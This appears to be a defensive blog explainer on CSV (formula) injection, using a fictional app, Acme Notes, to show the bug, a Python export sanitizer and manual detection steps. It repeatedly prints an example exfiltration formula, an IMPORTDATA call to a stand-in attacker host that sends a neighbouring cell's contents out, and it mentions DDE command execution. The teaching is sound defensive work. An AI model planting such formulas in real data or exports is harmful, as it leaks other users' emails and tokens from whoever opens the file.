CSV injection is a bug where attacker controlled text saved by your app turns into a live spreadsheet formula the moment someone exports the data and opens it. It is also called formula injection. The app itself looks fine and behaves correctly, which is exactly why this class of issue is so easy to miss.
What is CSV injection (formula injection)?
Spreadsheet programs treat a cell as a formula when its first character is =, +, -, or @. They do this for any file, including a plain CSV that your application generated. So if a user can store a value that starts with one of those characters, and that value later lands in an exported CSV, the spreadsheet will run it as code on whoever opens the file.
The key idea is that the danger does not live in your web app at all. Your pages render the value as harmless text. The danger appears later, in a different program, on a different machine, after the data leaves your system. That gap between where the data is stored and where it is interpreted is the whole bug.
The vulnerability is not in the value, it is in the moment a CSV cell stops being text and starts being a formula.
A concrete example on Acme Notes
Imagine a note taking app called Acme Notes. Users can set a display name. The app shows that name on the dashboard and never lets it break the page, so on the web it is perfectly safe.
A user signs up and sets their display name to a value crafted to behave as a formula:
Display name: =IMPORTDATA("https://attacker.example/x?d="&A2)
On the website this is just a weird string. It sits in the database. It renders as plain text in the user list. Nothing fires.
Now an admin opens the internal users page and clicks Export to CSV. The export writes one row per user, and the display name column contains that exact string. The admin double clicks the downloaded file and the spreadsheet opens it. The first character is =, so the cell is evaluated. Two outcomes are common:
- Data exfiltration via web requests. Functions like
IMPORTDATA,WEBSERVICE, orHYPERLINKcan fetch a URL. The attacker concatenates the contents of a neighboring cell into that URL, so the spreadsheet quietly sends another user’s email or token to a server the attacker controls. - Command execution via legacy DDE. Older spreadsheet setups support Dynamic Data Exchange, where a cell starting with
=could launch an external program. At a high level, a crafted cell asks the spreadsheet to start a process on the admin machine. Modern versions warn or block this, but legacy and misconfigured installs still run it.
The person who gets hit is not the attacker. It is the admin who trusted an export from their own product. That is what makes formula injection worth taking seriously.
Why this is an output encoding problem
It helps to name the real defect. This is an output encoding bug, the same family as cross site scripting, just aimed at a spreadsheet instead of a browser. Your app accepted text and stored it correctly. The mistake happens when you write that text into a CSV without encoding it for the program that will read it.
A browser interprets <script>. A spreadsheet interprets a leading =. In both cases the fix is the same shape: encode data for the context it is about to enter. A CSV opened in Excel or Google Sheets is an executable context, so it needs its own escaping.
Why scanners often miss it
Most automated scanners poke the live application and read the response. They look at rendered pages and API replies. By that measure Acme Notes passes. The stored name is escaped in HTML, there is no error, no reflected payload, no broken markup. The dangerous behavior only shows up after an export, in a separate program, triggered by a human action the scanner never performs. A pattern matcher that only watches HTTP responses has nothing to flag.
The fix in code
The reliable fix is at export time, because that is the context where the value becomes dangerous. When you build each CSV cell, neutralize any value that starts with a formula trigger. The common approach is to prefix risky cells with a single quote, or to escape the leading character so the spreadsheet treats the cell as text.
Dangerous cell written straight to the CSV:
=IMPORTDATA("https://attacker.example/x?d="&A2)
Safe cell after sanitizing on export:
'=IMPORTDATA("https://attacker.example/x?d="&A2)
Sanitizer applied to every exported field:
def safe_csv_field(value):
text = str(value)
if text and text[0] in ('=', '+', '-', '@', '\t', '\r'):
return "'" + text
return text
Three layers work together:
- Escape on export. Prefix any cell starting with
=,+,-,@, a tab, or a carriage return with a single quote. This is the load bearing fix and it covers every field. - Validate on input where it fits. If a field has no business starting with a formula character, such as a display name or a phone number, reject or clean it when it is saved. Treat this as defense in depth, not your only control.
- Set a safe export format. Quote every field, write a UTF8 byte order mark, and prefer a format that does not auto evaluate. Document that exports are data, not trusted spreadsheets.
One caution. Prefixing with a single quote changes the displayed value slightly, so apply it during CSV generation rather than mutating the stored record. The database should keep the real value, and only the exported copy gets the guard.
How to detect it
You can find this yourself without any special tooling:
- List every field a user can control: names, descriptions, notes, addresses, support messages.
- Set one of those fields to a benign probe like
=1+1or=HYPERLINK("https://example.com","click"). - Trigger every export path in the product, then open the file in a real spreadsheet and watch for a cell that evaluates instead of showing the literal text.
- Check email reports and scheduled exports too, since those reach people who never see the app.
If =1+1 shows up as 2, the field is injectable and your export needs the guard above.
Where this fits in finding bugs
Formula injection is a clean example of a flaw you only see when you understand how the data flows, from a user form to a stored record to an export to a spreadsheet on someone else’s machine. A checklist of known payloads against the live page will say everything is fine. This is the kind of assumption gap an autonomous researcher that tests how an app is actually used, rather than matching patterns, is built to find. For more on input handling bugs, see our injection and input category, and you can read what we are building on the about page.
Frequently asked questions
Is CSV injection the same as formula injection?
Yes, the two names describe the same bug. Attacker controlled text saved by your app becomes a live spreadsheet formula the moment someone exports the data and opens it in a program like Excel or Google Sheets. The trigger is a cell whose first character is =, +, -, or @.
Why do web vulnerability scanners usually miss CSV injection?
Most scanners poke the live application and read the HTTP response, where the stored value renders as harmless escaped text. The dangerous behavior only appears later, in a separate spreadsheet program, after a human triggers an export and opens the file. A pattern matcher that only watches responses has nothing to flag.
How do you fix CSV injection without breaking stored data?
Sanitize at export time, not in the database. When you build each CSV cell, prefix any value that starts with =, +, -, @, a tab, or a carriage return with a single quote so the spreadsheet reads it as text. Keep the real value in the database and apply the guard only to the exported copy. OWASP describes the same approach in its CSV Injection guide.
Who actually gets harmed by a CSV injection bug?
Usually not the attacker but the person who opens the export, often an admin who trusted a file from their own product. A formula like one using IMPORTDATA can quietly send a neighboring cell, such as another user’s email or token, to a server the attacker controls, all on the admin’s machine.
